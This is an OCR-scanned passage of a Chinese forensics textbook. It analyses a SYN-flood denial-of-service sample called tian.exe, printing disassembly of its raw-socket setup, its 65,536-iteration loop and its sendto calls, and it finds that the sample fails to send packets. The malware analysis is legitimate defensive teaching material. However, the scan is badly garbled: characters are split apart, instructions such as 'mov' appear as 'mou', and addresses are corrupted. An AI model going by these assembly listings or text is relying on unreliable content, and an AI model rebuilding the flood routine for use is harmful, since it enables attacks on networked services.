从 图 16-13 可 知 ,Tian. exe 调用 ws2_32. dll 的 wsasocketA 函数 来 创建 原始 套 接 字 并 


调用 setsockopt 进行 设置 。 


在 图 


16-14 的 显示 结果 中 ,“cmp edx,10000” 汇 编 代 码 指 的 是 建立 65 536 次 for 循环 ， 


理想 目的 是 实现 发 送 65 536 个 SYN 数据 包 。 

图 16-15 反映 出 ,在 65 536 次 循环 的 每 次 循环 中 ,因为 call tian. 004011F0 语句 的 存在 ， 
导致 程序 直接 跳 转 到 004011F0 地 址 处 执行 ,所 以 其 不 能 成 功 调用 ws2_32. dll 的 sendto Pš 
数 来 实现 SYN 数据 包 的 发 送 。 


|sub esp,260 


xor eax,eax 
lea edi,duord ptr ss:[esp+61] 
mov byte ptr ss:[esp*68] ,bl 
Inov dword ptr ss:[esp+80],7D0 
Fep stos dword ptr es:[edi] 
stos word ptr es:[edi] 
istos byte ptr es:[edi] 
[nou eax,duord ptr ss:[esp+274] 
[mou esi, dvord ptr ds:[eax] 
mov edi,dword ptr ds:[eax*4] 
[lea eax,duord ptr ss:[esp+E0] 
mov dword ptr ss:[esp+48],esi 
push eax 
push 162 
[mou dword ptr ss:[esp+18],edi 
IESI dword ptr ds:[<&WS2_32.WSAStartup>] 
test eax,eax 
je short tian.00n012C8 
push tian .00405058 
Imou ecx,esi 
tian. 00401090 
push edi 
mov ecx,esi 
tian. 00401030 
[nov ecx, d pti 


esiredixh+244 


16-12 socket 调用 的 ws2_32. dll 初始 化 过 程 


mov edx,dword ptr ds:[ecx+2C] 
ush edx 
dword ptr ds:[<&KERNEL32.SuspendThread>] 
push 1 
push 0 
push 0 
push QFF 
push 3 
push 2 
EM duord ptr ds:[<&WS2_32.WSASocketA>] 
mou ebp,eax 
cmp ebp,-1 
mou dword ptr ss:[esp+3C],ebp 
jnz short tian.0080130D 
push tian.005n05018 
mou ecx,esi 
ES tian.00n01D90 
push edi 
mou ecx,esi 
EST tian.00n01D30 
mou eax,dword ptr ds:[esi+edix4+244] 
mou ecx,dword ptr ds:[eax+2C] 
push ecx 
ESI dword ptr ds:[<&KERNEL32.SuspendThread>] 
lea edx,dword ptr ss:[esp+sC] 
push 4 
push edx 
push 2 
push 8 
push ebp 
mou dword ptr ss:[esp+69] ,1 
ES duord ptr ds:[<&uS2_32.setsockopt>] 


图 16-13 RAW 套 接 字 创建 和 设置 


实践 教程 


mou word ptr ss:[esp+28] ,dx 
mou dx,word ptr ds:[esi+78] 
push edx 
edi 
push 67324643 
mou word ptr ss:[esp+2E],ax 
ebp 
xor esi,esi 
push 48908 
mou dword ptr ss:[esp+34],esi 
mou byte ptr ss:[esp+38],50 
mou byte ptr ss:[esp+39] ,2 
EN edi 
mou ecx ,dword ptr ss:[esp+24] 
mou word ptr 5s:[esp+36] ,ax 
mou eax,dword ptr ss:[esp+20] 
push 14 
mou word ptr ss:[esp+3E],si 
mou dword ptr ds:[805260],eax 
mou dword ptr ds:[495264] ,ecx 
mou byte ptr ds:[505268],0 
mou byte ptr ds:[465269],6 
Em edi 
moy word ptr ds:[40526A],ax 
mou dword ptr ss:[esp+10],2800 
mou edx ,ebx 
inc ebx 
cmp edx,19998 
jnz short tian.004014E0 
mov ebx,1 
mov eax, dword ptr ss:[esp+hh] 
mou word ptr ss:[esp+1E],0 


push edx 
rep mous dword ptr es:[edi],dword ptr ds:[esi] 
mov dword ptr ss:[esp+98],8 
EST tian. 004011F0 
mou edx,dword ptr ss:[esp+NC] 
add esp,18 
mov word ptr ss:[esp+1E],ax 
mov ecx,5 
lea esi,dword ptr ss:[esp+14] 
lea edi,dword ptr ss:[esp*68] 
lea eax,dword ptr ss:[esp+50] 
push 10 
rep mous dword ptr es:[edi],dword ptr ds:[esi] 
push eax 
push 0 
lea ecx,duord ptr ss:[esp+6C] 
push 28 
push ecx 
push edx 
ESI dword ptr ds:[<&WS2_32.sendto>] 
cmp eax,-1 
nz short tian.00n015C8 
dword ptr ds:[<&KERNEL32.GetLastError>] 
push eax 
push tian.00n05020 
ESI dword ptr ds:[<&MSUCRT.printf>] 
add esp,8 
mou eax,dword ptr ss:[esp+10] 
dec eax 
mou dword ptr ss:[esp+10],eax 
jnz tian.994914D9 


jmp tian-9eu914C8 


图 16-15 调用 sendto 函数 发 送 RAW 的 
SYN 数据 包 


图 16-14 65536 次 for 循环 的 实现 


SYN 是 TCP/IP 建立 可 靠 连接 的 三 次 握手 的 第 一 次 握手 ,SYN 多 线程 攻击 是 指 在 不 
完成 完整 的 TCP 三 次 握手 的 前 提 下 ,在 短 时 间 向 攻击 目标 发 送 大量 的 SYN 数据 包 ,进而 占 
用 攻击 目标 的 系统 资源 ,影响 系统 运行 。 

tian. exe 程序 的 主要 功能 是 实现 SYN 多 线程 恶意 攻击 。 但 是 ,其 分 析 结 果 却 与 预期 结 
果 不 同 。SYN 多 线程 攻击 在 给 攻击 目标 造成 系统 资源 浪费 的 同时 ,也 对 自身 资源 造成 很 大 
浪费 。tian. exe 攻击 发 动 时 ,其 行为 对 本 身 系统 的 影响 如 下 。 

O 其 发 动 攻击 时 ,确实 占用 了 大 量 的 系统 CPU ,同时 也 增加 了 内 存 的 使 用 。 

© 在 其 发 动 攻击 时 ,并 没有 创建 过 多 的 线程 ,与 未 发 动 攻击 时 相 比 ,多 生成 了 一 个 线 
程 ,其 目的 并 不 是 发 送 大 量 的 半 连 接 的 SYN 数据 包 , 而 是 利用 这 个 线程 来 实现 65 536 次 
for 循环 ,进而 一 直 占 用 系统 资源 。 

O 其 运行 和 发 动 攻击 并 不 会 对 系统 的 注册 表 和 文件 系统 造成 影响 。 在 网 络 连接 方面 ， 
预期 结果 应 该 是 有 大 量 的 网 络 外 出 连接 ,但 实际 检测 结果 却 是 大 相 径 庭 ,造成 这 样 的 原因 
是 ,虽然 反 汇编 中 tian. exe 调用 sendto 函数 发 送 SYN 数据 包 , 但 是 其 并 没有 成 功 ,所 以 在 
网 络 连接 检测 中 不 能 发 现任 何 tian. exe 的 网 络 连接 记录 。 


6. 思考 题 
网 络 取证 的 特点 和 难点 都 有 哪些 ? 


